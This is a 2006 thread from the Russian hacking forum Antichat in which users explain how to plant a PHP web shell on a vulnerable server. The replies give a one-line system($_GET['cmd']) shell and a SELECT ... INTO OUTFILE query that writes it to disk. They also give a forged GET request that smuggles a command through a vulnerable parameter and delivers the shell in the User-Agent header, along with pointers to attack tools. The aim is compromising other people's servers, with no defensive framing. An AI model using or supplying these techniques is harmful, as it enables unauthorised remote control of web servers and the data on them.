ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Заливка shell при помощи потделки Http запроса
  #1  
Старый 28.10.2006, 14:56
Аватар для Dimazzz
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
Провел на форуме:
770940

Репутация: 23
Отправить сообщение для Dimazzz с помощью ICQ
По умолчанию Заливка shell при помощи потделки Http запроса

Огрмная просьба , расскажите о этом способе заливки шела по подробнее никак не могу понять как это сделать. Если кто еще умеет через Sql в админке тоже огромная просьба рассказать. Просто другие варианты отпали.
 
Ответить с цитированием

  #2  
Старый 28.10.2006, 16:22
Аватар для _-[A.M.D]HiM@S-_
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию

Полноценный шелл залит.
 
Ответить с цитированием

  #3  
Старый 29.10.2006, 08:35
Аватар для TaNkist
TaNkist
Участник форума
Регистрация: 06.04.2006
Сообщений: 257
Провел на форуме:
367179

Репутация: 76
По умолчанию

Подделка HTTP-запроса:
Может тебе поможет софтина RAW HTTP REQUEST (_h0ld-up-team.net.ru). Это прога отправит пакет, который создает на сервере файл и пропишет в него простой php-шелл.
SQL
Создаешь базу с 1 полем, со строкой:
PHP код:
<?system($_GET['cmd'])?>
Затем составляешь SQL-запрос:
SELECT <название поля> FROM <Имя таблицы> INTO OUTFILE 'путь к шеллу'
Единственное условие ты должен иметь права на запись в папку, куда собираешься залить шелл.
 
Ответить с цитированием

  #4  
Старый 29.10.2006, 10:38
Аватар для Sharky
Sharky
Познавший АНТИЧАТ
Регистрация: 01.05.2006
Сообщений: 1,021
Провел на форуме:
3424739

Репутация: 921


Отправить сообщение для Sharky с помощью ICQ
По умолчанию

Цитата:
Сообщение от TaNkist  
Подделка HTTP-запроса:
Может тебе поможет софтина RAW HTTP REQUEST (_h0ld-up-team.net.ru). Это прога отправит пакет, который создает на сервере файл и пропишет в него простой php-шелл.
SQL
Создаешь базу с 1 полем, со строкой:
PHP код:
<?system($_GET['cmd'])?>
Затем составляешь SQL-запрос:
SELECT <название поля> FROM <Имя таблицы> INTO OUTFILE 'путь к шеллу'
Единственное условие ты должен иметь права на запись в папку, куда собираешься залить шелл.
по поводу RAW HTTP REQUEST можно поподробней...как составлять запрос?
 
Ответить с цитированием

  #5  
Старый 29.10.2006, 18:49
Аватар для TaNkist
TaNkist
Участник форума
Регистрация: 06.04.2006
Сообщений: 257
Провел на форуме:
367179

Репутация: 76
По умолчанию

Примерный запрос
Код:
GET Уязвимый скрипт?Уязвимый параметр=|echo%20$HTTP_USER_AGENT%20>%20путь к шеллу|    
 HTTP/1.1
Host: Уязвимый хост
User-Agent: <? system(GET['cmd']) ?>
 
Ответить с цитированием

  #6  
Старый 29.10.2006, 22:01
Аватар для S1nt3z
S1nt3z
Новичок
Регистрация: 02.06.2005
Сообщений: 21
Провел на форуме:
10965

Репутация: 0
По умолчанию

хы .. можно воспользоваться прогой от отечественного произодителя Antichat
_http://antichat.ru/inetcrack/
 
Ответить с цитированием

  #7  
Старый 30.10.2006, 09:53
Аватар для Soul Linker
Soul Linker
Новичок
Регистрация: 05.09.2006
Сообщений: 15
Провел на форуме:
72328

Репутация: 5
По умолчанию

А вообще есть мануал по разным способам заливки шелла? или их не столь много?
 
Ответить с цитированием

  #8  
Старый 30.10.2006, 10:12
Аватар для S1nt3z
S1nt3z
Новичок
Регистрация: 02.06.2005
Сообщений: 21
Провел на форуме:
10965

Репутация: 0
По умолчанию

Just google it!
попробуй разобраться сам .. больше опыта будет
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Тунель при помощи Php. a33 PHP, PERL, MySQL, JavaScript 33 14.07.2007 21:09
Живые прокси xdx ICQ 111 15.04.2007 13:10
Коды состояния HTTP - Коды ошибок http сервера D=P=CH= MOD= *nix 6 15.10.2006 20:47



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ